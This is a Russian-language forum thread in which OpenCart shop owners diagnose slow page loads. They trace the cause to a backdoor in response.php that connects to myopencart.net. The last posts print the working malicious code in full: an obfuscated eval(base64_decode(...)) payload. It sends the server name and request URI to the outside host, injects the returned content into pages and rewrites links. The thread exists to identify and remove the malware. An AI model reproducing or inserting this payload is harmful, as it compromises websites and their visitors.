Перейти к публикации
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...

тормозит opencart


 Поделиться

Рекомендованные сообщения

ну как бы да. это не решение проблемы, а ключ к решению )

Несомненно. Я товарищу ovto к тому говорю, что у меня так же перестало тормозить, хоть я этим "ключом" и не успел воспользоваться. Проблему надо решать.. Как минимум уже четверо столкнулись с ней =(

Ссылка на комментарий
Поделиться на других сайтах


Ссылка на комментарий
Поделиться на других сайтах


  • 4 недели спустя...

так логи показывайте

Прошел почти месяц, и у меня заново те же проблемы. Я даже не знаю, что делать теперь. Быть может это хостинг такой? Вот мои логи, на всякий пожарный:

http://yadi.sk/d/D28DG4jK5EZiq

Ссылка на комментарий
Поделиться на других сайтах


Опять +5 секунд к загрузки сайта.. недавняя ситуация повторяется.

26.8 Кб 5.3 сек 5.05 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.31 сек 5.04 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.28 сек 5.07 Кб/сек

Ссылка на комментарий
Поделиться на других сайтах


Опять +5 секунд к загрузки сайта.. недавняя ситуация повторяется.

26.8 Кб 5.3 сек 5.05 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.31 сек 5.04 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.28 сек 5.07 Кб/сек

 

Та же проблема. Причем с таким же периодом.

Ссылка на комментарий
Поделиться на других сайтах


Опять +5 секунд к загрузки сайта.. недавняя ситуация повторяется.

26.8 Кб 5.3 сек 5.05 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.31 сек 5.04 Кб/сек

26.8 Кб 5.29 сек 5.06 Кб/сек

26.8 Кб 5.28 сек 5.07 Кб/сек

 

Та же проблема. Причем с таким же периодом.

и сразу вспоминается письмо от 30 апреля
Отправлено 30 Апрель 2013 - 21:29
Здравствуйте! Мы тут с ovto общались - у нас одинаковая проблема с задержкой в работе сайта и админки примерно 6 секунд на страницу требовалось для загрузки.. Сейчас все гуд, но неужто это и вправду вирус? Вы не разобрались случайно?
Отправлено 30 Апрель 2013 - 21:38
Нет. Нас уже минимум трое, а то и четверо.
Мне хостер сказал, что это связано с непонятными сокетами на адрес myopencart.net 
А вот откуда они и нахрена вообще, наши русскоязычные разработчики умалчивают..
С тех пор, у Вас всё было в порядке?

И, кстати о бабочках, какой хостер?

Ссылка на комментарий
Поделиться на других сайтах


myopencart.net это варезный сайт, в модулях выложенных на варезах находили бэкдор, который туда вёл.

бесплатный сыр

  • +1 1
Ссылка на комментарий
Поделиться на других сайтах

myopencart.net это варезный сайт, в модулях выложенных на варезах находили бэкдор, который туда вёл.

бесплатный сыр

Можно по-подробнее? Лично у меня модули только с местного ресурса и их на пальцах можно пересчитать.
Ссылка на комментарий
Поделиться на других сайтах


у меня тоже установлено всего два или три модуля. 

 

 

Опять +5 секунд к загрузки сайта.. недавняя ситуация повторяется.
26.8 Кб 5.3 сек 5.05 Кб/сек
26.8 Кб 5.29 сек 5.06 Кб/сек
26.8 Кб 5.29 сек 5.06 Кб/сек
26.8 Кб 5.31 сек 5.04 Кб/сек
26.8 Кб 5.29 сек 5.06 Кб/сек
26.8 Кб 5.28 сек 5.07 Кб/сек

 
Та же проблема. Причем с таким же периодом.

 

и сразу вспоминается письмо от 30 апреля
Отправлено 30 Апрель 2013 - 21:29
Здравствуйте! Мы тут с ovto общались - у нас одинаковая проблема с задержкой в работе сайта и админки примерно 6 секунд на страницу требовалось для загрузки.. Сейчас все гуд, но неужто это и вправду вирус? Вы не разобрались случайно?
Отправлено 30 Апрель 2013 - 21:38
Нет. Нас уже минимум трое, а то и четверо.
Мне хостер сказал, что это связано с непонятными сокетами на адрес myopencart.net 
А вот откуда они и нахрена вообще, наши русскоязычные разработчики умалчивают..
С тех пор, у Вас всё было в порядке?
И, кстати о бабочках, какой хостер?

хостер coopertino. с тех пор было все норм. и вот опять то же самое. 

Ссылка на комментарий
Поделиться на других сайтах


подробнее что? в Opencart узкое место - база. по логам видно что на базу нагрузки нет.

Прошел почти месяц, и у меня заново те же проблемы. Я даже не знаю, что делать теперь. Быть может это хостинг такой? Вот мои логи, на всякий пожарный:

http://yadi.sk/d/D28DG4jK5EZiq

 

остаётся хостинг медленный, либо бэкдоры эти.

Ссылка на комментарий
Поделиться на других сайтах

остаётся хостинг медленный, либо бэкдоры эти.

Хостинг у нас разный. И как раз сам хостер мне указывал на то, что проблемы явно не с их стороны, а именно на непонятные коннекты к тому самому варезу. Странно, что столько времени подобного не повторялось, а тут вдруг у тех же людей опять началось. Будем сравнивать модули. Но ovto тоже утверждает, что "левых" модулей не ставил..
Ссылка на комментарий
Поделиться на других сайтах


общался с ТП coopertino. обещают канал 100Мбит, но попробовать не получилось, т.к. хоть и дают 10 дней, нужен домен

Ссылка на комментарий
Поделиться на других сайтах

общался с ТП coopertino. обещают канал 100Мбит, но попробовать не получилось, т.к. хоть и дают 10 дней, нужен домен

 сейчас я им написал по поводу сокета на на адрес myopencart.net. 

если это так, и тормозит сайт именно поэтому, то как решить проблему эту?

Ссылка на комментарий
Поделиться на других сайтах


остаётся хостинг медленный, либо бэкдоры эти.

Хостинг у нас разный. И как раз сам хостер мне указывал на то, что проблемы явно не с их стороны, а именно на непонятные коннекты к тому самому варезу. Странно, что столько времени подобного не повторялось, а тут вдруг у тех же людей опять началось. Будем сравнивать модули. Но ovto тоже утверждает, что "левых" модулей не ставил..

Здравствуйте,

У Вас в файле response.php был добавлен сторонний код который часто обсуждается на специализированных форумах:

https://opencartforum.com/topic/21244-sait-stal-ochen-dolgo-otkryvatsia/

_ttp://www.******.**/threads/185843/page-62

Заменил файл на оригинальный, сохранив модифицированный как response.php.save - сейчас сайт открывается нормально. Не используйте модули и скрипты с непроверенных источников т.к. они могут содержать вредоносный код.

это мне ответили в ТП coopertino.

теперь сайт работает нормально. проверьте, быть может и у вас такая проблема.

Изменено пользователем rb2
[cencored] ссылка на варез ресурс
Ссылка на комментарий
Поделиться на других сайтах


остаётся хостинг медленный, либо бэкдоры эти.

Хостинг у нас разный. И как раз сам хостер мне указывал на то, что проблемы явно не с их стороны, а именно на непонятные коннекты к тому самому варезу. Странно, что столько времени подобного не повторялось, а тут вдруг у тех же людей опять началось. Будем сравнивать модули. Но ovto тоже утверждает, что "левых" модулей не ставил..
Здравствуйте,[/size]

У Вас в файле response.php был добавлен сторонний код который часто обсуждается на специализированных форумах:[/size]

https://opencartforum.com/topic/21244-sait-stal-ochen-dolgo-otkryvatsia/

_ttp://www.******.*/threads/185843/page-62

Заменил файл на оригинальный, сохранив модифицированный как response.php.save - сейчас сайт открывается нормально. Не используйте модули и скрипты с непроверенных источников т.к. они могут содержать вредоносный код.[/size]

это мне ответили в ТП coopertino. 

теперь сайт работает нормально. проверьте, быть может и у вас такая проблема.

Оригинальный файл весит 1 456 байт, а модифицированный 3 193 байт.

Заменил - помогло =)

Скорость загрузки сайта 0.28 сек

PS: права на файл 0640 были..

Ссылка на комментарий
Поделиться на других сайтах


По ходу я не первый ))) Все модули куплены здесь !!!

Думал что сервер ...  Я хостеру мозг вынес ... но он не помог))) В итоге сменил хостинг ...и как я удивился когда все повторилось снова ..обратился с просьбой помочь в ТП., ребята с ТП сразу сказали что причина в запросе на myopencart.net..заблочили мне запросы на myopencart.net ...сайт летает, а  полчаса назад нашел решение проблемы с заменой response.php

Предлагаю вычислить модуль и обратиться к администрации с просьбой бана автора

... я бы еще этому автору лично от себя в глаз бы двинул ...раз 5))) столько крови попил...гнида !!!

Ссылка на комментарий
Поделиться на других сайтах


По ходу я не первый ))) Все модули куплены здесь !!!

Думал что сервер ...  Я хостеру мозг вынес ... но он не помог))) В итоге сменил хостинг ...и как я удивился когда все повторилось снова ..обратился с просьбой помочь в ТП., ребята с ТП сразу сказали что причина в запросе на myopencart.net..заблочили мне запросы на myopencart.net ...сайт летает, а  полчаса назад нашел решение проблемы с заменой response.php на [censored]

Предлагаю вычислить модуль и обратиться к администрации с просьбой бана автора

... я бы еще этому автору лично от себя в глаз бы двинул ...раз 5))) столько крови попил...гнида !!!

Юзали бы поиск, нашли б решение не полчаса назад, а часов эдак 15 =))

Изменено пользователем freelancer
Ссылка на комментарий
Поделиться на других сайтах


По ходу я не первый ))) Все модули куплены здесь !!!

Думал что сервер ...  Я хостеру мозг вынес ... но он не помог))) В итоге сменил хостинг ...и как я удивился когда все повторилось снова ..обратился с просьбой помочь в ТП., ребята с ТП сразу сказали что причина в запросе на myopencart.net..заблочили мне запросы на myopencart.net ...сайт летает, а  полчаса назад нашел решение проблемы с заменой response.php на [censored]

Предлагаю вычислить модуль и обратиться к администрации с просьбой бана автора

... я бы еще этому автору лично от себя в глаз бы двинул ...раз 5))) столько крови попил...гнида !!!

Юзали бы поиск, нашли б решение не полчаса назад, а часов эдак 15 =))

))))))))))))) Как раз деньги платил новому хостеру ))))

Изменено пользователем freelancer
censored
Ссылка на комментарий
Поделиться на других сайтах


Только, что выяснил причину сильных задержек при открывании страниц. 

 

файл response.php имел в конце вот это:

 

$ouput =

 

eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
 
Ссылка на комментарий
Поделиться на других сайтах


Модуль симпла - обновление 3.5.3. Вот это:

 

 

<?php
class Response {
    private $headers = array();
    private $level = 0;
    private $output;

    public function addHeader($header) {
        $this->headers[] = $header;
    }

    public function redirect($url) {
        header('Location: ' . $url);
        exit;
    }

    public function setCompression($level) {
        $this->level = $level;
    }

    public function setOutput($output) {
        $this->output = $output;
    }

    private function compress($data, $level = 0) {
        if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
            $encoding = 'gzip';
        }

        if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
            $encoding = 'x-gzip';
        }

        if (!isset($encoding)) {
            return $data;
        }

        if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
            return $data;
        }

        if (headers_sent()) {
            return $data;
        }

        if (connection_status()) {
            return $data;
        }

        $this->addHeader('Content-Encoding: ' . $encoding);

        return gzencode($data, (int)$level);
    }

    public function output() {
        if ($this->output) {
            if ($this->level) {
                $ouput = $this->compress($this->output, $this->level);
            } else {
                $ouput = $this->output;
            }

            if (!headers_sent()) {
                foreach ($this->headers as $header) {
                    header($header, true);
                }
            }

            $ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
        }
    }
}
?>
 
Ссылка на комментарий
Поделиться на других сайтах


Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
 Поделиться

×
×
  • Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.